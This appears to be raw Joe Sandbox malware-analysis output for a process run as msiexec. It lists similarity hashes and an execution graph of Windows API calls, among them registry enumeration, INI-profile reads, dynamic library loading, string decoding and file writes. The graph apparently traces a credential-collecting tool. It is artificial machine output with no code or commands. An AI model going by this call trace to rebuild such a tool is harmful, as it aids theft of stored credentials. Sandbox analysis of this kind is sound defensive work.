                                                                                                            • API ID: ??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1033339047-0
                                                                                                            • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                            • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                            • malloc.MSVCRT ref: 00417407
                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                            • free.MSVCRT ref: 00417425
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2605342592-0
                                                                                                            • Opcode ID: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                            • Opcode Fuzzy Hash: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcslen$wcscat$wcscpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 1961120804-0
                                                                                                            • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                            • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:2.1%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0.5%
                                                                                                            Total number of Nodes:761
                                                                                                            Total number of Limit Nodes:20
                                                                                                            execution_graph 34016 40fc40 70 API calls 34192 403640 21 API calls 34017 427fa4 42 API calls 34193 412e43 _endthreadex 34194 425115 76 API calls __fprintf_l 34195 43fe40 133 API calls 34020 425115 83 API calls __fprintf_l 34021 401445 memcpy memcpy DialogBoxParamA 34022 440c40 34 API calls 33240 444c4a 33259 444e38 33240->33259 33242 444c56 GetModuleHandleA 33245 444c68 __set_app_type __p__fmode __p__commode 33242->33245 33244 444cfa 33246 444d02 __setusermatherr 33244->33246 33247 444d0e 33244->33247 33245->33244 33246->33247 33260 444e22 _controlfp 33247->33260 33249 444d13 _initterm __getmainargs _initterm 33250 444d6a GetStartupInfoA 33249->33250 33252 444d9e GetModuleHandleA 33250->33252 33261 40cf44 33252->33261 33256 444dcf _cexit 33258 444e04 33256->33258 33257 444dc8 exit 33257->33256 33259->33242 33260->33249 33312 404a99 LoadLibraryA 33261->33312 33263 40cf60 33264 40cf64 33263->33264 33320 410d0e 33263->33320 33264->33256 33264->33257 33266 40cf6f 33324 40ccd7 ??2@YAPAXI 33266->33324 33268 40cf9b 33338 407cbc 33268->33338 33273 40cfc4 33357 409825 memset 33273->33357 33274 40cfd8 33362 4096f4 memset 33274->33362 33279 40d181 ??3@YAXPAX 33281 40d1b3 33279->33281 33282 40d19f DeleteObject 33279->33282 33280 407e30 _strcmpi 33283 40cfee 33280->33283 33386 407948 free free 33281->33386 33282->33281 33285 40cff2 RegDeleteKeyA 33283->33285 33286 40d007 EnumResourceTypesA 33283->33286 33285->33279 33288 40d047 33286->33288 33289 40d02f MessageBoxA 33286->33289 33287 40d1c4 33387 4080d4 free 33287->33387 33291 40d0a0 CoInitialize 33288->33291 33367 40ce70 33288->33367 33289->33279 33384 40cc26 strncat memset RegisterClassA CreateWindowExA 33291->33384 33293 40d1cd 33388 407948 free free 33293->33388 33295 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33385 40c256 PostMessageA 33295->33385 33299 40d061 ??3@YAXPAX 33299->33281 33302 40d084 DeleteObject 33299->33302 33300 40d09e 33300->33291 33302->33281 33304 40d0f9 GetMessageA 33305 40d17b CoUninitialize 33304->33305 33306 40d10d 33304->33306 33305->33279 33307 40d113 TranslateAccelerator 33306->33307 33309 40d145 IsDialogMessage 33306->33309 33310 40d139 IsDialogMessage 33306->33310 33307->33306 33308 40d16d GetMessageA 33307->33308 33308->33305 33308->33307 33309->33308 33311 40d157 TranslateMessage DispatchMessageA 33309->33311 33310->33308 33310->33309 33311->33308 33313 404ac4 GetProcAddress 33312->33313 33314 404aec 33312->33314 33315 404ad4 33313->33315 33316 404add FreeLibrary 33313->33316 33318 404b13 33314->33318 33319 404afc MessageBoxA 33314->33319 33315->33316 33316->33314 33317 404ae8 33316->33317 33317->33314 33318->33263 33319->33263 33321 410d17 LoadLibraryA 33320->33321 33322 410d3c 33320->33322 33321->33322 33323 410d2b GetProcAddress 33321->33323 33322->33266 33323->33322 33325 40cd08 ??2@YAPAXI 33324->33325 33327 40cd26 33325->33327 33328 40cd2d 33325->33328 33396 404025 6 API calls 33327->33396 33330 40cd66 33328->33330 33331 40cd59 DeleteObject 33328->33331 33389 407088 33330->33389 33331->33330 33333 40cd6b 33392 4019b5 33333->33392 33336 4019b5 strncat 33337 40cdbf _mbscpy 33336->33337 33337->33268 33398 407948 free free 33338->33398 33341 407cf7 33343 407a1f malloc memcpy free free 33341->33343 33344 407ddc 33341->33344 33346 407d7a free 33341->33346 33350 407d83 33341->33350 33352 407e04 33341->33352 33402 40796e 7 API calls 33341->33402 33343->33341 33344->33352 33404 407a1f 33344->33404 33346->33341 33350->33341 33403 406f30 malloc memcpy free 33350->33403 33399 407a55 33352->33399 33353 407e30 33354 407e57 33353->33354 33355 407e38 33353->33355 33354->33273 33354->33274 33355->33354 33356 407e41 _strcmpi 33355->33356 33356->33354 33356->33355 33412 4097ff 33357->33412 33359 409854 33417 409731 33359->33417 33363 4097ff 3 API calls 33362->33363 33364 409723 33363->33364 33437 40966c 33364->33437 33451 4023b2 33367->33451 33373 40ced3 33535 40cdda 7 API calls 33373->33535 33374 40cece 33378 40cf3f 33374->33378 33488 40c3d0 memset GetModuleFileNameA strrchr 33374->33488 33378->33299 33378->33300 33380 40ceed 33514 40affa 33380->33514 33384->33295 33385->33304 33386->33287 33387->33293 33388->33264 33397 406fc7 memset _mbscpy 33389->33397 33391 40709f CreateFontIndirectA 33391->33333 33393 4019e1 33392->33393 33394 4019c2 strncat 33393->33394 33395 4019e5 memset LoadIconA 33393->33395 33394->33393 33395->33336 33396->33328 33397->33391 33398->33341 33400 407a65 33399->33400 33401 407a5b free 33399->33401 33400->33353 33401->33400 33402->33341 33403->33350 33405 407a38 33404->33405 33406 407a2d free 33404->33406 33411 406f30 malloc memcpy free 33405->33411 33407 407a44 33406->33407 33410 40796e 7 API calls 33407->33410 33409 407a43 33409->33407 33410->33352 33411->33409 33428 406f96 GetModuleFileNameA 33412->33428 33414 409805 strrchr 33415 409814 33414->33415 33416 409817 _mbscat 33414->33416 33415->33416 33416->33359 33429 44b090 33417->33429 33422 40930c 3 API calls 33423 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33422->33423 33424 4097c5 LoadStringA 33423->33424 33425 4097db 33424->33425 33425->33424 33426 4097f3 33425->33426 33436 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33425->33436 33426->33279 33428->33414 33430 40973e _mbscpy _mbscpy 33429->33430 33431 40930c 33430->33431 33432 44b090 33431->33432 33433 409319 memset GetPrivateProfileStringA 33432->33433 33434 409374 33433->33434 33435 409364 WritePrivateProfileStringA 33433->33435 33434->33422 33435->33434 33436->33425 33447 406f81 GetFileAttributesA 33437->33447 33439 409675 33440 4096ee 33439->33440 33441 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33439->33441 33440->33280 33448 409278 GetPrivateProfileStringA 33441->33448 33443 4096c9 33449 409278 GetPrivateProfileStringA 33443->33449 33445 4096da 33450 409278 GetPrivateProfileStringA 33445->33450 33447->33439 33448->33443 33449->33445 33450->33440 33537 409c1c 33451->33537 33454 401e69 memset 33576 410dbb 33454->33576 33457 401ec2 33600 4070e3 strlen _mbscat _mbscpy _mbscat 33457->33600 33458 401ed4 33589 406f81 GetFileAttributesA 33458->33589 33461 401ee6 strlen strlen 33463 401f15 33461->33463 33464 401f28 33461->33464 33601 4070e3 strlen _mbscat _mbscpy _mbscat 33463->33601 33590 406f81 GetFileAttributesA 33464->33590 33467 401f35 33591 401c31 33467->33591 33470 401f75 33472 402165 33470->33472 33473 401f9c memset 33470->33473 33471 401c31 5 API calls 33471->33470 33475 402195 ExpandEnvironmentStringsA 33472->33475 33476 4021a8 _strcmpi 33472->33476 33602 410b62 RegEnumKeyExA 33473->33602 33608 406f81 GetFileAttributesA 33475->33608 33476->33373 33476->33374 33477 401fc9 33477->33472 33479 401fd9 atoi 33477->33479 33483 402076 memset memset strlen strlen 33477->33483 33484 4020dd strlen strlen 33477->33484 33485 4070e3 strlen _mbscat _mbscpy _mbscat 33477->33485 33486 406f81 GetFileAttributesA 33477->33486 33487 402167 _mbscpy 33477->33487 33607 410b62 RegEnumKeyExA 33477->33607 33479->33477 33480 401fef memset memset sprintf 33479->33480 33603 410b1e 33480->33603 33483->33477 33484->33477 33485->33477 33486->33477 33487->33472 33489 40c422 33488->33489 33490 40c425 _mbscat _mbscpy _mbscpy 33488->33490 33489->33490 33491 40c49d 33490->33491 33492 40c512 33491->33492 33493 40c502 GetWindowPlacement 33491->33493 33494 40c538 33492->33494 33626 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33492->33626 33493->33492 33619 409b31 33494->33619 33498 40ba28 33499 40ba87 33498->33499 33504 40ba3c 33498->33504 33629 406c62 LoadCursorA SetCursor 33499->33629 33501 40ba8c 33630 403c16 33501->33630 33696 404734 33501->33696 33704 404785 33501->33704 33707 4107f1 33501->33707 33502 40ba43 _mbsicmp 33502->33504 33503 40baa0 33505 407e30 _strcmpi 33503->33505 33504->33499 33504->33502 33710 40b5e5 10 API calls 33504->33710 33508 40bab0 33505->33508 33506 40bafa SetCursor 33506->33380 33508->33506 33509 40baf1 qsort 33508->33509 33509->33506 34000 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33514->34000 33516 40b00e 33517 40b016 33516->33517 33518 40b01f GetStdHandle 33516->33518 34001 406d1a CreateFileA 33517->34001 33520 40b01c 33518->33520 33521 40b035 33520->33521 33522 40b12d 33520->33522 34002 406c62 LoadCursorA SetCursor 33521->34002 34006 406d77 9 API calls 33522->34006 33525 40b136 33536 40c580 28 API calls 33525->33536 33526 40b087 33533 40b0a1 33526->33533 34004 40a699 12 API calls 33526->34004 33527 40b042 33527->33526 33527->33533 34003 40a57c strlen WriteFile 33527->34003 33530 40b0d6 33531 40b116 CloseHandle 33530->33531 33532 40b11f SetCursor 33530->33532 33531->33532 33532->33525 33533->33530 34005 406d77 9 API calls 33533->34005 33535->33374 33536->33378 33549 409a32 33537->33549 33540 409c80 memcpy memcpy 33545 409cda 33540->33545 33541 408db6 12 API calls 33541->33545 33542 409d18 ??2@YAPAXI ??2@YAPAXI 33543 409d54 ??2@YAPAXI 33542->33543 33546 409d8b 33542->33546 33543->33546 33545->33540 33545->33541 33545->33542 33546->33546 33559 409b9c 33546->33559 33548 4023c1 33548->33454 33550 409a44 33549->33550 33551 409a3d ??3@YAXPAX 33549->33551 33552 409a52 33550->33552 33553 409a4b ??3@YAXPAX 33550->33553 33551->33550 33554 409a63 33552->33554 33555 409a5c ??3@YAXPAX 33552->33555 33553->33552 33556 409a83 ??2@YAPAXI ??2@YAPAXI 33554->33556 33557 409a73 ??3@YAXPAX 33554->33557 33558 409a7c ??3@YAXPAX 33554->33558 33555->33554 33556->33540 33557->33558 33558->33556 33560 407a55 free 33559->33560 33561 409ba5 33560->33561 33562 407a55 free 33561->33562 33563 409bad 33562->33563 33564 407a55 free 33563->33564 33565 409bb5 33564->33565 33566 407a55 free 33565->33566 33567 409bbd 33566->33567 33568 407a1f 4 API calls 33567->33568 33569 409bd0 33568->33569 33570 407a1f 4 API calls 33569->33570 33571 409bda 33570->33571 33572 407a1f 4 API calls 33571->33572 33573 409be4 33572->33573 33574 407a1f 4 API calls 33573->33574 33575 409bee 33574->33575 33575->33548 33577 410d0e 2 API calls 33576->33577 33578 410dca 33577->33578 33579 410dfd memset 33578->33579 33609 4070ae 33578->33609 33582 410e1d 33579->33582 33584 410e7f _mbscpy 33582->33584 33612 410d3d _mbscpy 33582->33612 33583 401e9e strlen strlen 33583->33457 33583->33458 33584->33583 33586 410e5b 33613 410add RegQueryValueExA 33586->33613 33588 410e73 33588->33584 33589->33461 33590->33467 33592 401c4c 33591->33592 33593 401ca1 33592->33593 33614 410add RegQueryValueExA 33592->33614 33593->33470 33593->33471 33595 401c6a 33595->33593 33596 401c71 strchr 33595->33596 33596->33593 33597 401c85 strchr 33596->33597 33597->33593 33598 401c94 33597->33598 33615 406f06 strlen 33598->33615 33600->33458 33601->33464 33602->33477 33604 410b34 33603->33604 33606 410b4c 33604->33606 33618 410add RegQueryValueExA 33604->33618 33606->33477 33607->33477 33608->33476 33610 4070bd GetVersionExA 33609->33610 33611 4070ce 33609->33611 33610->33611 33611->33579 33611->33583 33612->33586 33613->33588 33614->33595 33616 406f17 33615->33616 33617 406f1a memcpy 33615->33617 33616->33617 33617->33593 33618->33606 33620 409b40 33619->33620 33622 409b4e 33619->33622 33627 409901 memset SendMessageA 33620->33627 33623 409b99 33622->33623 33624 409b8b 33622->33624 33623->33498 33628 409868 SendMessageA 33624->33628 33626->33494 33627->33622 33628->33623 33629->33501 33631 4107f1 FreeLibrary 33630->33631 33632 403c30 LoadLibraryA 33631->33632 33633 403c74 33632->33633 33634 403c44 GetProcAddress 33632->33634 33636 4107f1 FreeLibrary 33633->33636 33634->33633 33635 403c5e 33634->33635 33635->33633 33639 403c6b 33635->33639 33637 403c7b 33636->33637 33638 404734 3 API calls 33637->33638 33640 403c86 33638->33640 33639->33637 33711 4036e5 33640->33711 33643 4036e5 23 API calls 33644 403c9a 33643->33644 33645 4036e5 23 API calls 33644->33645 33646 403ca4 33645->33646 33647 4036e5 23 API calls 33646->33647 33648 403cae 33647->33648 33721 4085d2 33648->33721 33654 403cd2 33656 403cf7 33654->33656 33873 402bd1 37 API calls 33654->33873 33657 403d1c 33656->33657 33874 402bd1 37 API calls 33656->33874 33756 402c5d 33657->33756 33661 4070ae GetVersionExA 33662 403d31 33661->33662 33664 403d61 33662->33664 33875 402b22 42 API calls 33662->33875 33666 403d97 33664->33666 33876 402b22 42 API calls 33664->33876 33667 403dcd 33666->33667 33877 402b22 42 API calls 33666->33877 33768 410808 33667->33768 33671 404785 FreeLibrary 33672 403de8 33671->33672 33772 402fdb 33672->33772 33675 402fdb 29 API calls 33676 403e00 33675->33676 33784 4032b7 33676->33784 33685 403e3b 33687 403e73 33685->33687 33688 403e46 _mbscpy 33685->33688 33831 40fb00 33687->33831 33879 40f334 333 API calls 33688->33879 33697 404785 FreeLibrary 33696->33697 33698 40473b LoadLibraryA 33697->33698 33699 40474c GetProcAddress 33698->33699 33700 40476e 33698->33700 33699->33700 33701 404764 33699->33701 33702 404781 33700->33702 33703 404785 FreeLibrary 33700->33703 33701->33700 33702->33503 33703->33702 33705 4047a3 33704->33705 33706 404799 FreeLibrary 33704->33706 33705->33503 33706->33705 33708 410807 33707->33708 33709 4107fc FreeLibrary 33707->33709 33708->33503 33709->33708 33710->33504 33712 4037c5 33711->33712 33713 4036fb 33711->33713 33712->33643 33713->33712 33714 403716 strchr 33713->33714 33714->33712 33715 403730 33714->33715 33880 4021b6 memset 33715->33880 33717 40373f _mbscpy _mbscpy strlen 33718 4037a4 _mbscpy 33717->33718 33719 403789 sprintf 33717->33719 33881 4023e5 16 API calls 33718->33881 33719->33718 33722 4085e2 33721->33722 33882 4082cd 11 API calls 33722->33882 33724 4085ec 33725 403cba 33724->33725 33726 40860b memset 33724->33726 33733 40821d 33725->33733 33884 410b62 RegEnumKeyExA 33726->33884 33728 408637 33728->33725 33729 40865c memset 33728->33729 33886 40848b 10 API calls 33728->33886 33887 410b62 RegEnumKeyExA 33728->33887 33885 410add RegQueryValueExA 33729->33885 33734 40823f 33733->33734 33735 403cc6 33734->33735 33736 408246 memset 33734->33736 33741 4086e0 33735->33741 33888 410b62 RegEnumKeyExA 33736->33888 33738 40826f 33738->33735 33889 4080ed 11 API calls 33738->33889 33890 410b62 RegEnumKeyExA 33738->33890 33891 4045db 33741->33891 33743 4088ef 33899 404656 33743->33899 33747 408737 wcslen 33747->33743 33753 40876a 33747->33753 33748 40877a wcsncmp 33748->33753 33750 404734 3 API calls 33750->33753 33751 404785 FreeLibrary 33751->33753 33752 408812 memset 33752->33753 33754 40883c memcpy wcschr 33752->33754 33753->33743 33753->33748 33753->33750 33753->33751 33753->33752 33753->33754 33755 4088c3 LocalFree 33753->33755 33902 40466b _mbscpy 33753->33902 33754->33753 33755->33753 33757 402c7a 33756->33757 33758 402c87 memset 33757->33758 33767 402d9a 33757->33767 33903 410b62 RegEnumKeyExA 33758->33903 33760 402cb2 33761 410b1e RegQueryValueExA 33760->33761 33763 402d3a sprintf 33760->33763 33760->33767 33904 402bd1 37 API calls 33760->33904 33905 402bd1 37 API calls 33760->33905 33906 410b62 RegEnumKeyExA 33760->33906 33762 402ce4 memset sprintf 33761->33762 33762->33760 33763->33760 33767->33661 33771 410816 33768->33771 33769 4107f1 FreeLibrary 33770 403ddd 33769->33770 33770->33671 33771->33769 33773 402ff9 33772->33773 33774 403006 memset 33773->33774 33776 403122 33773->33776 33907 410b62 RegEnumKeyExA 33774->33907 33776->33675 33777 410b1e RegQueryValueExA 33778 403058 memset sprintf 33777->33778 33782 403033 33778->33782 33779 4030a2 memset 33908 410b62 RegEnumKeyExA 33779->33908 33782->33776 33782->33777 33782->33779 33783 410b62 RegEnumKeyExA 33782->33783 33909 402db3 24 API calls 33782->33909 33783->33782 33785 4032d5 33784->33785 33786 4033a9 33784->33786 33910 4021b6 memset 33785->33910 33799 4034e4 memset memset 33786->33799 33788 4032e1 33911 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33788->33911 33790 4032ea 33791 4032f8 memset GetPrivateProfileSectionA 33790->33791 33912 4023e5 16 API calls 33790->33912 33791->33786 33796 40332f 33791->33796 33793 40339b strlen 33793->33786 33793->33796 33795 403350 strchr 33795->33796 33796->33786 33796->33793 33913 4021b6 memset 33796->33913 33914 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33796->33914 33915 4023e5 16 API calls 33796->33915 33800 410b1e RegQueryValueExA 33799->33800 33801 40353f 33800->33801 33802 40357f 33801->33802 33803 403546 _mbscpy 33801->33803 33807 403985 33802->33807 33916 406d55 strlen _mbscat 33803->33916 33805 403565 _mbscat 33917 4033f0 19 API calls 33805->33917 33918 40466b _mbscpy 33807->33918 33811 4039aa 33813 4039ff 33811->33813 33919 40f6e2 33811->33919 33935 40f460 12 API calls 33811->33935 33936 4038e8 21 API calls 33811->33936 33814 404785 FreeLibrary 33813->33814 33815 403a0b 33814->33815 33816 4037ca memset memset 33815->33816 33938 444551 memset 33816->33938 33819 4038e2 33819->33685 33878 40f334 333 API calls 33819->33878 33821 40382e 33822 406f06 2 API calls 33821->33822 33823 403843 33822->33823 33824 406f06 2 API calls 33823->33824 33825 403855 strchr 33824->33825 33826 403884 _mbscpy 33825->33826 33827 403897 strlen 33825->33827 33828 4038bf _mbscpy 33826->33828 33827->33828 33829 4038a4 sprintf 33827->33829 33947 4023e5 16 API calls 33828->33947 33829->33828 33833 40fb10 33831->33833 33832 403e7f 33841 40f96c 33832->33841 33833->33832 33834 40fb55 RegQueryValueExA 33833->33834 33834->33832 33835 40fb84 33834->33835 33836 404734 3 API calls 33835->33836 33837 40fb91 33836->33837 33837->33832 33838 40fc19 LocalFree 33837->33838 33839 40fbdd memcpy memcpy 33837->33839 33838->33832 33951 40f802 7 API calls 33839->33951 33842 4070ae GetVersionExA 33841->33842 33843 40f98d 33842->33843 33844 4045db 7 API calls 33843->33844 33852 40f9a9 33844->33852 33845 404656 FreeLibrary 33846 403e85 33845->33846 33853 4442ea memset 33846->33853 33847 40fae6 33847->33845 33848 40fa13 memset WideCharToMultiByte 33849 40fa43 _strnicmp 33848->33849 33848->33852 33850 40fa5b WideCharToMultiByte 33849->33850 33849->33852 33851 40fa88 WideCharToMultiByte 33850->33851 33850->33852 33851->33852 33852->33847 33852->33848 33854 410dbb 7 API calls 33853->33854 33855 444329 33854->33855 33952 40759e strlen strlen 33855->33952 33860 410dbb 7 API calls 33861 444350 33860->33861 33862 40759e 3 API calls 33861->33862 33863 44435a 33862->33863 33864 444212 64 API calls 33863->33864 33865 444366 memset memset 33864->33865 33866 410b1e RegQueryValueExA 33865->33866 33867 4443b9 ExpandEnvironmentStringsA strlen 33866->33867 33868 4443f4 _strcmpi 33867->33868 33869 4443e5 33867->33869 33870 403e91 33868->33870 33871 44440c 33868->33871 33869->33868 33870->33503 33872 444212 64 API calls 33871->33872 33872->33870 33873->33656 33874->33657 33875->33664 33876->33666 33877->33667 33878->33685 33879->33687 33880->33717 33881->33712 33883 40841c 33882->33883 33883->33724 33884->33728 33885->33728 33886->33728 33887->33728 33888->33738 33889->33738 33890->33738 33892 404656 FreeLibrary 33891->33892 33893 4045e3 LoadLibraryA 33892->33893 33894 404651 33893->33894 33895 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33893->33895 33894->33743 33894->33747 33896 40463d 33895->33896 33897 404643 33896->33897 33898 404656 FreeLibrary 33896->33898 33897->33894 33898->33894 33900 404666 33899->33900 33901 40465c FreeLibrary 33899->33901 33900->33654 33901->33900 33902->33753 33903->33760 33904->33763 33905->33760 33906->33760 33907->33782 33908->33782 33909->33782 33910->33788 33911->33790 33912->33791 33913->33795 33914->33796 33915->33796 33916->33805 33917->33802 33918->33811 33937 40466b _mbscpy 33919->33937 33921 40f6fa 33922 4045db 7 API calls 33921->33922 33923 40f708 33922->33923 33925 404734 3 API calls 33923->33925 33929 40f7e2 33923->33929 33924 404656 FreeLibrary 33926 40f7f1 33924->33926 33930 40f715 33925->33930 33927 404785 FreeLibrary 33926->33927 33928 40f7fc 33927->33928 33928->33811 33929->33924 33930->33929 33931 40f797 WideCharToMultiByte 33930->33931 33932 40f7b8 strlen 33931->33932 33933 40f7d9 LocalFree 33931->33933 33932->33933 33934 40f7c8 _mbscpy 33932->33934 33933->33929 33934->33933 33935->33811 33936->33811 33937->33921 33939 44458b 33938->33939 33940 40381a 33939->33940 33948 410add RegQueryValueExA 33939->33948 33940->33819 33946 4021b6 memset 33940->33946 33942 4445a4 33942->33940 33949 410add RegQueryValueExA 33942->33949 33944 4445c1 33944->33940 33950 444879 30 API calls 33944->33950 33946->33821 33947->33819 33948->33942 33949->33944 33950->33940 33951->33838 33953 4075c9 33952->33953 33954 4075bb _mbscat 33952->33954 33955 444212 33953->33955 33954->33953 33972 407e9d 33955->33972 33958 44424d 33959 444274 33958->33959 33960 444258 33958->33960 33980 407ef8 33958->33980 33961 407e9d 9 API calls 33959->33961 33997 444196 51 API calls 33960->33997 33968 4442a0 33961->33968 33963 407ef8 9 API calls 33963->33968 33964 4442ce 33994 407f90 33964->33994 33968->33963 33968->33964 33970 444212 64 API calls 33968->33970 33990 407e62 33968->33990 33969 407f90 FindClose 33971 4442e4 33969->33971 33970->33968 33971->33860 33973 407f90 FindClose 33972->33973 33974 407eaa 33973->33974 33975 406f06 2 API calls 33974->33975 33976 407ebd strlen strlen 33975->33976 33977 407ee1 33976->33977 33978 407eea 33976->33978 33998 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33998 33978->33958 33981 407f03 FindFirstFileA 33980->33981 33982 407f24 FindNextFileA 33980->33982 33983 407f3f 33981->33983 33984 407f46 strlen strlen 33982->33984 33985 407f3a 33982->33985 33983->33984 33989 407f7f 33983->33989 33986 407f76 33984->33986 33984->33989 33987 407f90 FindClose 33985->33987 33999 4070e3 strlen _mbscat _mbscpy _mbscat 33986->33999 33987->33983 33989->33958 33991 407e94 33990->33991 33992 407e6c strcmp 33990->33992 33991->33968 33992->33991 33993 407e83 strcmp 33992->33993 33993->33991 33995 407fa3 33994->33995 33996 407f99 FindClose 33994->33996 33995->33969 33996->33995 33997->33958 33998->33978 33999->33989 34000->33516 34001->33520 34002->33527 34003->33526 34004->33533 34005->33530 34006->33525 34024 411853 RtlInitializeCriticalSection memset 34025 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34201 40a256 13 API calls 34203 432e5b 17 API calls 34205 43fa5a 20 API calls 34027 401060 41 API calls 34208 427260 CloseHandle memset memset 34031 410c68 FindResourceA SizeofResource LoadResource LockResource 34210 405e69 14 API calls 34033 433068 15 API calls __fprintf_l 34212 414a6d 18 API calls 34213 43fe6f 134 API calls 34035 424c6d 15 API calls __fprintf_l 34214 426741 19 API calls 34037 440c70 17 API calls 34038 443c71 42 API calls 34041 427c79 24 API calls 34217 416e7e memset __fprintf_l 34045 42800b 47 API calls 34046 425115 85 API calls __fprintf_l 34220 41960c 61 API calls 34047 43f40c 122 API calls __fprintf_l 34050 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34051 43f81a 20 API calls 34053 414c20 memset memset 34054 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34224 414625 18 API calls 34225 404225 modf 34226 403a26 strlen WriteFile 34228 40422a 12 API calls 34232 427632 memset memset memcpy 34233 40ca30 59 API calls 34234 404235 26 API calls 34055 42ec34 61 API calls __fprintf_l 34056 425115 76 API calls __fprintf_l 34235 425115 77 API calls __fprintf_l 34237 44223a 38 API calls 34062 43183c 112 API calls 34238 44b2c5 _onexit __dllonexit 34243 42a6d2 memcpy __allrem 34064 405cda 60 API calls 34251 43fedc 138 API calls 34252 4116e1 16 API calls __fprintf_l 34067 4244e6 19 API calls 34069 42e8e8 127 API calls __fprintf_l 34070 4118ee RtlLeaveCriticalSection 34257 43f6ec 22 API calls 34072 425115 119 API calls __fprintf_l 34073 410cf3 EnumResourceNamesA 34260 4492f0 memcpy memcpy 34262 43fafa 18 API calls 34264 4342f9 15 API calls __fprintf_l 34074 4144fd 19 API calls 34266 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34267 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34270 443a84 _mbscpy 34272 43f681 17 API calls 34077 404487 22 API calls 34274 415e8c 16 API calls __fprintf_l 34081 411893 RtlDeleteCriticalSection __fprintf_l 34082 41a492 42 API calls 34278 403e96 34 API calls 34279 410e98 memset SHGetPathFromIDList SendMessageA 34084 426741 109 API calls __fprintf_l 34085 4344a2 18 API calls 34086 4094a2 10 API calls 34088 4108a4 7 API calls 34282 4116a6 15 API calls __fprintf_l 34283 43f6a4 17 API calls 34284 440aa3 20 API calls 34286 427430 45 API calls 34090 4090b0 7 API calls 34091 4148b0 15 API calls 34093 4118b4 RtlEnterCriticalSection 34094 4014b7 CreateWindowExA 34095 40c8b8 19 API calls 34097 4118bf RtlTryEnterCriticalSection 34291 42434a 18 API calls __fprintf_l 34293 405f53 12 API calls 34105 43f956 59 API calls 34107 40955a 17 API calls 34108 428561 36 API calls 34109 409164 7 API calls 34297 404366 19 API calls 34301 40176c ExitProcess 34304 410777 42 API calls 34114 40dd7b 51 API calls 34115 425d7c 16 API calls __fprintf_l 34306 43f6f0 25 API calls 34307 42db01 22 API calls 34116 412905 15 API calls __fprintf_l 34308 403b04 54 API calls 34309 405f04 SetDlgItemTextA GetDlgItemTextA 34310 44b301 ??3@YAXPAX 34313 4120ea 14 API calls 3 library calls 34314 40bb0a 8 API calls 34316 413f11 strcmp 34120 434110 17 API calls __fprintf_l 34123 425115 108 API calls __fprintf_l 34317 444b11 _onexit 34125 425115 76 API calls __fprintf_l 34128 429d19 10 API calls 34320 444b1f __dllonexit 34321 409f20 _strcmpi 34130 42b927 31 API calls 34324 433f26 19 API calls __fprintf_l 34325 44b323 FreeLibrary 34326 427f25 46 API calls 34327 43ff2b 17 API calls 34328 43fb30 19 API calls 34137 414d36 16 API calls 34139 40ad38 7 API calls 34330 433b38 16 API calls __fprintf_l 34007 44b33b 34008 44b344 ??3@YAXPAX 34007->34008 34009 44b34b 34007->34009 34008->34009 34010 44b354 ??3@YAXPAX 34009->34010 34011 44b35b 34009->34011 